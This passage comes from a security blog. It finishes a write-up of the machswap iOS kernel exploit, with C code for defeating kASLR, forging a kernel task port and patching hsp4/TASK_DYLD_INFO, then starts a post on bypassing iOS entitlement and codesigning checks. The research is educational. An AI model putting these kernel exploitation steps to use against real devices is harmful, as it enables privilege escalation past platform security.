<p>The <code class="highlighter-rouge">slide_byte</code> spans values 0 through 255; however, in the case of 0, a <code class="highlighter-rouge">base</code> of 0x21000000 is used, so we can model <code class="highlighter-rouge">slide_byte</code> as taking values 1 through 256. This means that the lowest <code class="highlighter-rouge">base</code> is 0x01200000, and the highest is 0x21000000. Subtracting these gives 0x1fe00000, over 500MB of address space! Taking this into account, it is clear that brute forcing by simply trying every possible address would more than likely hit unmapped memory.</p>
<p>However, there is a trick you can use to guarantee that you won’t hit unmapped memory. Take a look at this output from <code class="highlighter-rouge">jtool</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ jtool -l ~/Desktop/kernels/84-1211 | grep LC_SEGMENT_64
LC 00: LC_SEGMENT_64 Mem: 0xfffffff007004000-0xfffffff007078000 __TEXT
LC 01: LC_SEGMENT_64 Mem: 0xfffffff007078000-0xfffffff007098000 __DATA_CONST
LC 02: LC_SEGMENT_64 Mem: 0xfffffff007098000-0xfffffff0075c8000 __TEXT_EXEC
LC 03: LC_SEGMENT_64 Mem: 0xfffffff0075c8000-0xfffffff0075cc000 __LAST
LC 04: LC_SEGMENT_64 Mem: 0xfffffff0075cc000-0xfffffff0075d0000 __KLD
LC 05: LC_SEGMENT_64 Mem: 0xfffffff0075d0000-0xfffffff007678000 __DATA
LC 06: LC_SEGMENT_64 Mem: 0xfffffff007678000-0xfffffff007690000 __BOOTDATA
LC 07: LC_SEGMENT_64 Mem: 0xfffffff005ca4000-0xfffffff006138000 __PRELINK_TEXT
LC 08: LC_SEGMENT_64 Mem: 0xfffffff0077e8000-0xfffffff0079e0000 __PRELINK_INFO
[...]
</code></pre></div></div>
<p>Up until the beginning of PRELINK_TEXT, all regions (including __TEXT) are mapped completely contiguously (right as one segment ends, another one starts) at the base of the kernel virtual address space (VAS). Therefore, if we are able to find a pointer into __TEXT (i.e. the address of a function), we can then derive the base of the kernel via brute force, as we are guaranteed not to hit any unmapped memory! The only question is: how do we get such a pointer?</p>
<p>In C++, every polymorphic object (one with virtual methods) contains a pointer to a vtable: an array of function pointers for the virtual methods the object implements. This vtable pointer is located at offset 0x0 within the object. If we can find such a C++ object (and therefore its vtable), we can get our function pointer, and derive the kernel slide.</p>
<p>Since we have a read primitive set up, and an attacker-controlled port, we can traverse kernel memory to find such a C++ object.</p>
<p>One example is the IOSurfaceUserClient object, which we created earlier when we set up our heap spray. We can register the port we opened to the client via the <code class="highlighter-rouge">mach_ports_register</code> API, which stores a pointer to the port in a field within our <code class="highlighter-rouge">task</code> struct: <code class="highlighter-rouge">itk_registered</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kern_return_t
mach_ports_register(
    task_t                  task,
    mach_port_array_t       memory,
    mach_msg_type_number_t  portsCnt)
{
    [...]
    for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
        ipc_port_t old;
        old = task->itk_registered[i];
        task->itk_registered[i] = ports[i];
        ports[i] = old;
    }
    [...]
    return KERN_SUCCESS;
}
</code></pre></div></div>
<p>So from our task struct, we can read the <code class="highlighter-rouge">itk_registered</code> field to find the IOSurface ipc_port, follow its <code class="highlighter-rouge">ip_kobject</code> field to the C++ object itself, dereference offset 0x0 to find the vtable, and then dereference any of the vtable methods to find our <code class="highlighter-rouge">__TEXT</code> pointer. However, we first need to find our task struct. For this, we can look at <code class="highlighter-rouge">itk_space</code>. This is an address space which holds the Mach port rights owned by a task, mapping the <code class="highlighter-rouge">uint32_t</code> port handles to kernel-side <code class="highlighter-rouge">ipc_port_t</code> pointers. If we can find a message sent to a port owned by our process, we can find the <code class="highlighter-rouge">itk_space</code> pointer, traverse kernel memory to find the address of a port allocated within our task, and from there reach our own task struct (<code class="highlighter-rouge">ipc_space->is_task</code>).</p>
<p>Luckily, our fakeport is owned by our process, and we have a userland handle to which we can send a message; we can then read the <code class="highlighter-rouge">ip_messages</code> struct within our fakeport to find the kernel representation of the Mach message that was sent. This is similar to a technique I have used in the past to get a buffer of data into kernelspace, except this time it is used for ports instead of data.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static kern_return_t send_port(mach_port_t rcv, mach_port_t myP)
{
    typedef struct {
        mach_msg_header_t Head;
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t task_port;
    } Request;
    [...]
    InP->msgh_body.msgh_descriptor_count = 1;
    InP->task_port.name = myP;
    InP->task_port.disposition = MACH_MSG_TYPE_COPY_SEND;
    InP->task_port.type = MACH_MSG_PORT_DESCRIPTOR;
    err = mach_msg(&InP->Head, MACH_SEND_MSG | MACH_SEND_TIMEOUT, InP->Head.msgh_size, 0, 0, 5, 0);
    [...]
}
</code></pre></div></div>
<p>Here we set up a complex message containing a Mach port descriptor, and place our port handle into that descriptor. We then call <code class="highlighter-rouge">send_port</code> using our fakeport as the <code class="highlighter-rouge">rcv</code> argument, and a newly allocated port with both receive and send rights as our <code class="highlighter-rouge">myP</code> argument.</p>
<p>Once the Mach message has been sent, it will be present within <code class="highlighter-rouge">fakeport->ip_messages.port.messages</code>. We can then traverse from this message to find the pointer to our task, as follows:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ret = send_port(the_one, gangport);
uint64_t ikmq_base = fakeport->ip_messages.port.messages;
uint64_t ikm_header = 0x0;
rk64(ikmq_base + 0x18, ikm_header); /* ipc_kmsg->ikm_header */
uint64_t port_addr = 0x0;
rk64(ikm_header + 0x24, port_addr); /* 0x24 is mach_msg_header_t + body + offset of our port into mach_port_descriptor_t */
uint64_t itk_space = 0x0;
rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);
uint64_t ourtask = 0x0;
rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
</code></pre></div></div>
<p>Now that we have a pointer to our task struct, we can use the <code class="highlighter-rouge">mach_ports_register</code> trick to register the IOSurface UserClient, and perform a few more reads to find the vtable entry:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ret = mach_ports_register(mach_task_self(), &client, 1);
uint64_t iosruc_port = 0x0;
rk64(ourtask + offsets->struct_offsets.task_itk_registered, iosruc_port);
uint64_t iosruc_addr = 0x0;
rk64(iosruc_port + offsetof(kport_t, ip_kobject), iosruc_addr);
uint64_t iosruc_vtab = 0x0;
rk64(iosruc_addr + 0x0, iosruc_vtab);
uint64_t get_trap_for_index_addr = 0x0;
rk64(iosruc_vtab + (offsets->iosurface.get_external_trap_for_index * 0x8), get_trap_for_index_addr);
</code></pre></div></div>
<p><code class="highlighter-rouge">get_trap_for_index_addr</code> is the address of the <code class="highlighter-rouge">IOSurfaceRootUserClient::getExternalTrapForIndex</code> function, which resides in kernel’s <code class="highlighter-rouge">__TEXT</code> region. We can then walk backwards until we reach the magic value at the kernel header (<code class="highlighter-rouge">MH_MAGIC_64</code>).</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define KERNEL_HEADER_OFFSET 0x4000
#define KERNEL_SLIDE_STEP 0x100000

uint64_t kernel_base = (get_trap_for_index_addr & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;

do
{
    uint32_t kbase_value = 0x0;
    rk32(kernel_base, kbase_value);

    if (kbase_value == MH_MAGIC_64)
    {
        LOG("found kernel_base: 0x%llx", kernel_base);
        break;
    }

    kernel_base -= KERNEL_SLIDE_STEP;
} while (true);

uint64_t kslide = kernel_base - offsets->constant.kernel_image_base;
</code></pre></div></div>
<p>Having deduced the kslide value, kASLR is now defeated, and we continue our exploitation by building the final primitive: the fake kernel task port. This task port will allow full read and write access to the kernel’s VM map, allowing arbitrary modification of kernel data.</p>
<h3 id="0x08-building-a-fake-kernel-task-port">0x08 Building a Fake Kernel Task Port</h3>
<p>A kernel task port is simply an ipc_port struct of type <code class="highlighter-rouge">IKOT_TASK</code>, with a representation of the kernel’s task_t struct attached. However, when the task port is used in the Mach API, many of the fields aren’t checked or accessed at any point. This means we don’t need to use the original ipc_port or task_t structs. We can simply forge arbitrary ones containing the minimum of data required for the Mach API to recognise them as a valid port. Luckily, there are only two things we need to find. The first is the kernel’s <code class="highlighter-rouge">vm_map_t</code>, a struct which holds data about the kernel’s virtual address space.</p>
<p>The kernel implements a nice feature which allows you to easily loop through <code class="highlighter-rouge">proc_t</code> structs (and hence their corresponding <code class="highlighter-rouge">task_t</code> counterparts) to find target processes, via a linked list (<code class="highlighter-rouge">p_list</code>) at the start of the <code class="highlighter-rouge">proc_t</code> struct. This includes the kernel’s proc and task structs (<code class="highlighter-rouge">kernel_task</code> actually runs as a “normal” process on your system, with the PID 0 – you can see it in Activity Monitor on macOS).</p>
<p>We already have the address of our own <code class="highlighter-rouge">task_t</code> from when we needed to find our IOSurfaceRootUserClient port earlier. So we can dereference the <code class="highlighter-rouge">bsd_info</code> pointer to get the corresponding <code class="highlighter-rouge">proc_t</code> struct, and then loop backward through the list until we reach the first entry, <code class="highlighter-rouge">kernel_task</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct proc {
    LIST_ENTRY(proc) p_list;    /* List of all processes. */
    void *           task;      /* corresponding task (static) */
    struct proc *    p_pptr;    /* Pointer to parent process. (LL) */
    [...]
</code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>uint64_t kernproc = ourproc;
while (kernproc != 0x0)
{
    uint32_t found_pid = 0x0;
    rk32(kernproc + offsets->struct_offsets.proc_pid, found_pid);

    if (found_pid == 0)
    {
        break;
    }

    /*
        kernproc will always be at the start of the linked list,
        so we loop backwards in order to find it
    */
    rk64(kernproc + 0x0, kernproc);
}
</code></pre></div></div>
<p>From there we can read <code class="highlighter-rouge">proc_t->task</code> to get to the kernel’s <code class="highlighter-rouge">task_t</code> struct, which contains a field which is a pointer to the kernel’s <code class="highlighter-rouge">vm_map_t</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct task {
    /* Synchronization/destruction information */
    decl_lck_mtx_data(,lock)    /* Task's lock */
    _Atomic uint32_t ref_count; /* Number of references to me */
    boolean_t active;           /* Task has not been terminated */
    boolean_t halting;          /* Task is being halted */

    /* Virtual timers */
    uint32_t vtimers;

    /* Miscellaneous */
    vm_map_t map;               /* Address space description */
    queue_chain_t tasks;        /* global list of tasks */
    [...]
</code></pre></div></div>
<p>To build our fake task struct, we can simply use some hardcoded data, and drop in our kernel <code class="highlighter-rouge">vm_map</code> pointer:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> fake_task->lock.data = 0x0;
fake_task->lock.type = 0x22;
fake_task->ref_count = 100;
fake_task->active = 1;
fake_task->map = kernel_vm_map;
*(uint32_t *)((uint64_t)fake_task + offsets->struct_offsets.task_itk_self) = 1;
</code></pre></div></div>
<p>We also need to find the kernel’s ipc_space, via the <code class="highlighter-rouge">ip_receiver</code> field: this points to the IPC space of the task which holds the port’s receive right (ie. the task to which messages sent on the port are delivered). This is easy to find, however, as the receiver of our IOSurfaceUserClient port is the kernel (this is where messages sent on that port end up).</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /*
since our IOSurfaceRoot userclient is owned by kernel, the
ip_receiver field will point to kernel's ipc space
*/
uint64_t ipc_space_kernel = 0x0;
rk64(iosruc_port + offsetof(kport_t, ip_receiver), ipc_space_kernel);
LOG("ipc_space_kernel: 0x%llx", ipc_space_kernel);
</code></pre></div></div>
<p>We then temporarily turn our fakeport (<code class="highlighter-rouge">the_one</code>) into a kernel task port by updating its <code class="highlighter-rouge">ip_receiver</code>, which we can then use as an early tfp0 primitive in order to allocate and write some memory for our kernel task and kernel port structs (error checking omitted):</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* the_one should now have access to kernel mem */
uint64_t kbase_data = kread64(the_one, kernel_base);
LOG("got kernel base: %llx", kbase_data);
/* allocate kernel task */
uint64_t kernel_task_buf = kalloc(the_one, 0x600);
LOG("kernel_task_buf: 0x%llx", kernel_task_buf);
kwrite(the_one, kernel_task_buf, (void *)fake_task, 0x600);
/* allocate kernel port */
uint64_t kernel_port_buf = kalloc(the_one, 0x300);
LOG("kernel_port_buf: 0x%llx", kernel_port_buf);
fakeport->ip_kobject = kernel_task_buf;
kwrite(the_one, kernel_port_buf, (void *)fakeport, 0x300);
</code></pre></div></div>
<p>Our fakeport <code class="highlighter-rouge">the_one</code> is now a “full” (but forged) kernel task port (tfp0) which can be used to read, write, and allocate kernel memory, and is backed completely by kernel buffers – no userland allocations are used after this point.</p>
<h3 id="0x09-buttoning-up-hsp4-task_dyld_info-patch">0x09 Buttoning Up: HSP4, TASK_DYLD_INFO patch</h3>
<p>There are a couple more finishing touches needed before we can exit our exploit. The first is the hsp4 (<code class="highlighter-rouge">host_get_special_port(..., 4, ...)</code>) patch, which allows processes running as root to get a send right to the kernel task port (tfp0).</p>
<p>This is fairly easy to set up: we simply need to write into the <code class="highlighter-rouge">ipc_port_t special</code> array of the <code class="highlighter-rouge">realhost</code> struct.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct host {
    decl_lck_mtx_data(,lock)    /* lock to protect exceptions */
    ipc_port_t special[HOST_MAX_SPECIAL_PORT + 1];
    struct exception_action exc_actions[EXC_TYPES_COUNT];
};
</code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /*
host_get_special_port(4) patch
allows the kernel task port to be accessed by any root process
*/
kwrite64(the_one, realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
</code></pre></div></div>
<p>We can then quickly elevate our UID to 0 (root) in order to check the patch worked, as the <code class="highlighter-rouge">host_get_special_port</code> API requires root access.</p>
<p><em>Note: we also de-elevate back to the mobile user before exiting the exploit as leaving ourselves as root can cause instability in the system upon exiting the app. Jailbreaks can quickly and easily re-elevate to root if and when required.</em></p>
<p>Another (newer) patch is the <code class="highlighter-rouge">TASK_DYLD_INFO</code> patch, suggested by @Siguza <a href="https://twitter.com/s1guza/status/1057072987814445056">here</a>. The <code class="highlighter-rouge">task_info</code> API allows an application to retrieve information about a specific task, including info about the dynamic linker. As we can see in the following snippet, the kernel will return three fields of data stored in the <code class="highlighter-rouge">task</code> struct back to userland.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>case TASK_DYLD_INFO:
{
    task_dyld_info_t info;
    [...]
    info = (task_dyld_info_t)task_info_out;
    info->all_image_info_addr = task->all_image_info_addr;
    info->all_image_info_size = task->all_image_info_size;

    /* only set format on output for those expecting it */
    if (*task_info_count >= TASK_DYLD_INFO_COUNT) {
        info->all_image_info_format = task_has_64Bit_addr(task) ?
            TASK_DYLD_ALL_IMAGE_INFO_64 :
            TASK_DYLD_ALL_IMAGE_INFO_32;
        *task_info_count = TASK_DYLD_INFO_COUNT;
    } else {
        *task_info_count = TASK_LEGACY_DYLD_INFO_COUNT;
    }
    break;
}
</code></pre></div></div>
<p>Since the kernel doesn’t use dyld, nor will our fake task port ever be used by the kernel itself, we can repurpose these fields to store data about the kernel. In this case, we use the <code class="highlighter-rouge">all_image_info_addr</code> field to store the slid base address of the kernel, and the <code class="highlighter-rouge">all_image_info_size</code> field to store the kernel slide. This removes the need for offset-storing files and provides a clean method to find the (previously somewhat tricky to deduce) kernel slide.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /*
task_info TASK_DYLD_INFO patch
this patch (credit @Siguza) allows you to provide tfp0 to the task_info
API, and retrieve some data from the kernel's task struct
we use it for storing the kernel base and kernel slide values
*/
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_addr) = kernel_base;
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_size) = kslide;
</code></pre></div></div>
<p>You can then call <code class="highlighter-rouge">task_info</code>, providing tfp0 as your port and supplying the <code class="highlighter-rouge">TASK_DYLD_INFO</code> flavor.</p>
<h3 id="0x0a-closing-words">0x0A: Closing Words</h3>
<p>For a long time I was completely daunted by the idea of exploiting something as complex as the iOS kernel. However, once I dived in and gave it a go, it quickly started to make more and more sense. There is a lot of great reading material online to refer to, including writeups and other open-source exploits. I’m now a big fan of MIG reference counting bugs due to the simplicity and consistency of their exploitation, and would love to find one as a 0day one day. ;)</p>
<p>Of course, thanks to @s1guza, @littlelailo, and @stek29 for development help, and @s0rrymybad for the initial bug details and PoC code. You can find their Twitter handles below.</p>
<p>If you have any questions feel free to @ me and/or follow me on Twitter, and take a look through my GitHub if you’re interested in other open-source iOS projects. Thanks!</p>
<p><strong>Twitter:</strong> <a href="https://twitter.com/iBSparkes">https://twitter.com/iBSparkes</a></p>
<p><strong>GitHub:</strong> <a href="https://github.com/PsychoTea">https://github.com/PsychoTea</a></p>
<p><strong>machswap Source Code:</strong> <a href="https://github.com/PsychoTea/machswap">https://github.com/PsychoTea/machswap</a></p>
<p><strong>machswap2 (SMAP Version):</strong> <a href="https://github.com/PsychoTea/machswap2">https://github.com/PsychoTea/machswap2</a></p>
<p><strong>@s1guza:</strong> <a href="https://twitter.com/s1guza">https://twitter.com/s1guza</a></p>
<p><strong>@littlelailo:</strong> <a href="https://twitter.com/littlelailo">https://twitter.com/littlelailo</a></p>
<p><strong>@stek29:</strong> <a href="https://twitter.com/stek29">https://twitter.com/stek29</a></p>
<p><strong>@s0rrymybad:</strong> <a href="https://twitter.com/s0rrymybad">https://twitter.com/s0rrymybad</a></p>
<h2 id="diving-into-the-ios-kernel-breaking-entitlements">Diving into the iOS Kernel: Breaking Entitlements (2018-04-06)</h2>
<p><a href="https://sparkes.zone/blog/ios/2018/04/06/diving-into-the-kernel-entitlements">https://sparkes.zone/blog/ios/2018/04/06/diving-into-the-kernel-entitlements</a></p>
<p>Under the hood of the iOS kernel, under AMFI and the Sandbox, lies codesigning. Codesigning validates whether code is allowed to run on an iOS device. If it isn’t signed by Apple - no worky. But if you have a jailbroken device, this restriction is removed - it’s one of the reasons we jailbreak. If you’ve ever used a jailbroken device, you would’ve experienced this without even realising it: you think Apple signed Cydia for us? (Hint: no).</p>
<p>These checks are mandated by the kernel and various kernel extensions (read: AppleMobileFileIntegrity.kext, Sandbox.kext), and under a typical kppbypass jailbreak they’re fairly trivial to patch. Some patching of the kernel’s functions and boom - restrictions removed. But under kppless we aren’t afforded the same liberty. With the advent of a hardware protection mechanism, AMCC, on newer iDevices, the development community has drifted to a more favourable approach to jailbreaking: why bypass these strong mechanisms when we can simply work within their bounds? Enter kppless.</p>
<p>I won’t go into detail on how codesigning works on a low level here, perhaps I will leave that to a different post. Instead, I want to talk about <strong>entitlements</strong>, and why they’re something worth worrying about on a kppless jailbreak.</p>
<p>Entitlements dictate some of the ‘rules’ a binary is allowed to break on an iOS device, and also modify a binary’s behaviour in the context of the kernel and inter-process communication. For example, the <code class="highlighter-rouge">com.apple.private.skip-library-validation</code> entitlement means that when a library is loaded into a process holding this entitlement, the library is able to skip the Team ID and platform binary checks usually performed by the kernel. This is what allows us to load tweaks and other unauthorized libraries into processes on the system.</p>
<p>One of the rather irritating security mechanisms implemented as part of the Sandbox and codesigning is called containerizing. Containerizing basically means placing 3rd-party software (eg, App Store apps) into a specific, separated container (it also applies to removable Apple apps but isn’t relevant here). It’s effectively damage control: put all the scary stuff into separate little tubs, and seal it off from the rest of the system.</p>
<p>Linking back to what I touched on earlier, under kppless we don’t have the same access to patch these checks. So running binaries outside of a container wouldn’t work - and that’s a big deal. Every single binary used on a jailbroken system is outside of a container. For example, utilities such as the <code class="highlighter-rouge">bash</code> shell, <code class="highlighter-rouge">dpkg</code>, <code class="highlighter-rouge">apt</code>, and <code class="highlighter-rouge">Cydia</code> all live in various folders in the root filesystem; <code class="highlighter-rouge">/bin</code>, <code class="highlighter-rouge">/usr/bin</code>, <code class="highlighter-rouge">/Applications</code>.
When you try to run such a binary, you would see a <code class="highlighter-rouge">Killed: 9</code> error in shell, and receive a message such as this in syslog:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Sandbox: hook..execve() killing {name} pid {pid}[UID: {uid}]: outside of container && !i_can_has_debugger
</code></pre></div></div>
<p>So what can we do under kppless to bypass this check? Enter: the <code class="highlighter-rouge">platform-application</code> entitlement.</p>
<p><code class="highlighter-rouge">platform-application</code> effectively allows a binary to run outside of a container. This means that <code class="highlighter-rouge">bash</code>, <code class="highlighter-rouge">dpkg</code>, etc, will be allowed to run from other areas of the filesystem. You can add entitlements such as <code class="highlighter-rouge">platform-application</code> to a binary with a simple xml or plist file and a tool such as <code class="highlighter-rouge">ldid</code>, or Jonathan Levin’s <code class="highlighter-rouge">jtool</code>. However, this is performed on disk, which poses a slight problem in this context. It would be pretty infeasible to go and resign every binary used on a jailbroken system, and also update the thousands of GUI apps and shell tools on Cydia. Not to mention, there’s no way we can do this at runtime. If the binary were modified, the CDHash would be invalidated and that binary would fail basic codesigning checks. So what can we do about it?</p>
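<p>For illustration, an entitlements file you might feed to a signing tool such as <code class="highlighter-rouge">ldid</code> could look like the following sketch (the exact set of keys a given tool or jailbreak applies will vary):</p>

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>platform-application</key>
    <true/>
</dict>
</plist>
```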
<p>Well, entitlements might be stored on the disk <em>to start with</em>, but they have to be loaded into kernel memory at <em>some point</em>. Let’s think about how codesigning works on a kernel level.
First the Mach-O is read and parsed, the required slice is located, and then the load commands are parsed (<a href="http://xr.anadoxin.org/source/xref/macos-10.12.6-sierra/xnu-3789.70.16/bsd/kern/mach_loader.c#496">parse_machfile</a>). One of those load commands is <code class="highlighter-rouge">LC_CODE_SIGNATURE</code>, a load command which points to the code signature of the binary. The <a href="http://xr.anadoxin.org/source/xref/macos-10.12.6-sierra/xnu-3789.70.16/bsd/kern/mach_loader.c#load_code_signature">load_code_signature</a> function is then called on the binary, which checks to see if a code signature has been previously parsed and stored (<a href="http://xr.anadoxin.org/source/xref/macos-10.12.6-sierra/xnu-3789.70.16/bsd/kern/ubc_subr.c#3462">ubc_cs_blob_get</a>), and if not, loads it from the file via <a href="http://xr.anadoxin.org/source/xref/macos-10.12.6-sierra/xnu-3789.70.16/bsd/kern/ubc_subr.c#3046">ubc_cs_blob_add</a>. Let’s take a further look at how that works.</p>
<h3 id="jumping-into-ubc_cs_blob_add">Jumping into ubc_cs_blob_add</h3>
<p>One of the first things that is done is a new <code class="highlighter-rouge">cs_blob</code> structure is allocated and partially filled. This structure contains all the codesigning information; the cpu type, offset of code directory within the binary, the CDHash and CDHash type, whether the binary is marked as a platform binary, and lastly, <em>the entitlements</em>.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="mi">099</span> <span class="k">struct</span> <span class="n">cs_blob</span> <span class="p">{</span>
<span class="mi">100</span> <span class="k">struct</span> <span class="n">cs_blob</span> <span class="o">*</span><span class="n">csb_next</span><span class="p">;</span> <span class="cm">/* The next csblob in the chain */</span>
<span class="mi">101</span> <span class="n">cpu_type_t</span> <span class="n">csb_cpu_type</span><span class="p">;</span> <span class="cm">/* The cpu type */</span>
<span class="mi">102</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">csb_flags</span><span class="p">;</span> <span class="cm">/* Flags such as CS_VALID, CS_KILL, CS_GET_TASK_ALLOW */</span>
<span class="mi">103</span> <span class="kt">off_t</span> <span class="n">csb_base_offset</span><span class="p">;</span> <span class="cm">/* Offset of Mach-O binary in fat binary */</span>
<span class="mi">104</span> <span class="kt">off_t</span> <span class="n">csb_start_offset</span><span class="p">;</span> <span class="cm">/* Blob coverage area start, from csb_base_offset */</span>
<span class="mi">105</span> <span class="kt">off_t</span> <span class="n">csb_end_offset</span><span class="p">;</span> <span class="cm">/* Blob coverage area end, from csb_base_offset */</span>
<span class="mi">106</span> <span class="n">vm_size_t</span> <span class="n">csb_mem_size</span><span class="p">;</span>
<span class="mi">107</span> <span class="n">vm_offset_t</span> <span class="n">csb_mem_offset</span><span class="p">;</span>
<span class="mi">108</span> <span class="n">vm_address_t</span> <span class="n">csb_mem_kaddr</span><span class="p">;</span>
<span class="mi">109</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">csb_cdhash</span><span class="p">[</span><span class="n">CS_CDHASH_LEN</span><span class="p">];</span> <span class="cm">/* The raw CDHash as an array */</span>
<span class="mi">110</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">cs_hash</span> <span class="o">*</span><span class="n">csb_hashtype</span><span class="p">;</span> <span class="cm">/* The type of CDHash and the functions for interpreting it */</span>
<span class="mi">111</span> <span class="n">vm_size_t</span> <span class="n">csb_hash_pagesize</span><span class="p">;</span> <span class="cm">/* each hash entry represent this many bytes in the file */</span>
<span class="mi">112</span> <span class="n">vm_size_t</span> <span class="n">csb_hash_pagemask</span><span class="p">;</span>
<span class="mi">113</span> <span class="n">vm_size_t</span> <span class="n">csb_hash_pageshift</span><span class="p">;</span>
<span class="mi">114</span> <span class="n">vm_size_t</span> <span class="n">csb_hash_firstlevel_pagesize</span><span class="p">;</span> <span class="cm">/* First hash this many bytes, then hash the hashes together */</span>
<span class="mi">115</span> <span class="k">const</span> <span class="n">CS_CodeDirectory</span> <span class="o">*</span><span class="n">csb_cd</span><span class="p">;</span>
<span class="mi">116</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">csb_teamid</span><span class="p">;</span>
<span class="mi">117</span> <span class="k">const</span> <span class="n">CS_GenericBlob</span> <span class="o">*</span><span class="n">csb_entitlements_blob</span><span class="p">;</span> <span class="cm">/* Magic, length, then the raw cstring entitlements */</span>
<span class="mi">118</span> <span class="kt">void</span> <span class="o">*</span> <span class="n">csb_entitlements</span><span class="p">;</span> <span class="cm">/* The entitlements as an OSDictionary */</span>
<span class="mi">119</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">csb_platform_binary</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>
<span class="mi">120</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">csb_platform_path</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>
<span class="mi">121</span> <span class="p">};</span></code></pre></figure>
<p>Then the CodeDirectory is parsed by <code class="highlighter-rouge">cs_validate_csblob</code>, choosing the correct subdirectory to use, and finding the entitlements. The code then checks whether the actual blob size is smaller than the allocation provided by <code class="highlighter-rouge">load_code_signature</code>, and if so, re-allocates it into a better-fitting buffer.</p>
<p>The rest of the <code class="highlighter-rouge">cs_blob</code> structure is then filled out, mapping in the code directory, entitlements, flags, the hashtype, etc.
Once finished, <code class="highlighter-rouge">mac_vnode_check_signature</code> is called. This finds the MACF policy which is responsible for validating code signatures (hey AMFI!), and calls into it to make sure everything is in order. AMFI actually calls out to amfid here, which is where our userland patch resides. Here the CDHash is loaded into a dictionary passed by AMFI, which validates that the CDHash is correct and allows code execution to continue. The placement of this call to AMFI is <strong>extremely important</strong>, and is part of the reason why this patch became so intricate to implement. The <code class="highlighter-rouge">cs_blob</code> the kernel is currently halfway through generating <strong>hasn’t yet been assigned anywhere</strong>. This new blob is currently floating somewhere around the kernel’s address space, and would be extremely inefficient to locate. <strong>This is a problem</strong>. When we grab the binary’s vnode from within amfid and look at <code class="highlighter-rouge">vnode->ubc_info->cs_blob</code> (where the cs_blob struct is eventually stored), it’s <strong>zero</strong>. This threw me at first, until I read through this code and figured out how the binary is actually processed - then it suddenly clicked why this was occurring.</p>
<p>The first idea that comes to mind here is simply to generate our own csblob, and place it into <code class="highlighter-rouge">vnode->ubc_info->cs_blob</code> before the kernel does. But that doesn’t work - either the csblob is simply overwritten by the <code class="highlighter-rouge">ubc_cs_blob_add</code> function, or it would flag up errors within the kernel and wouldn’t pass validation checks. Hmm. What would be perfect here is if there was some way to write our own <code class="highlighter-rouge">cs_blob</code>, and then <em>not</em> have the kernel overwrite it. That way we could add our entitlements into <code class="highlighter-rouge">csb_entitlements</code> and/or <code class="highlighter-rouge">csb_entitlements_blob</code> without having them messed with afterwards.</p>
<p>Let’s continue reading the code and see if we can find anything which fits that precondition.</p>
<p>The kernel then checks for the <code class="highlighter-rouge">CS_PLATFORM_BINARY</code> flag, setting <code class="highlighter-rouge">csb_platform_binary</code> and/or <code class="highlighter-rouge">csb_platform_path</code> if necessary, and parsing the teamid via <code class="highlighter-rouge">csblob_parse_teamid</code>.</p>
<p>Then, the kernel loops through all of the <code class="highlighter-rouge">cs_blob</code> structs currently present, checking for an overlap. As mentioned in the struct above, the first member of the <code class="highlighter-rouge">cs_blob</code> struct is a pointer to another <code class="highlighter-rouge">cs_blob</code> struct. This functions as a kind of list or chain, with each <code class="highlighter-rouge">cs_blob</code> linking to its predecessor, in case one is ever replaced.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="mi">3249</span> <span class="cm">/* check if this new blob overlaps with an existing blob */</span>
<span class="mi">3250</span> <span class="k">for</span> <span class="p">(</span><span class="n">oblob</span> <span class="o">=</span> <span class="n">uip</span><span class="o">-></span><span class="n">cs_blobs</span><span class="p">;</span>
<span class="mi">3251</span> <span class="n">oblob</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="mi">3252</span> <span class="n">oblob</span> <span class="o">=</span> <span class="n">oblob</span><span class="o">-></span><span class="n">csb_next</span><span class="p">)</span> <span class="p">{</span></code></pre></figure>
<p>The first set of checks are some simple comparisons between the blobs, the idea here being to check for similarity between the blobs, indicating a conflict. Notice how if <code class="highlighter-rouge">blob->csb_platform_binary</code> and/or <code class="highlighter-rouge">blob->csb_teamid</code> isn’t set, or if the inner <code class="highlighter-rouge">if</code> conditions fail, the rest of the checks are simply skipped over.</p>
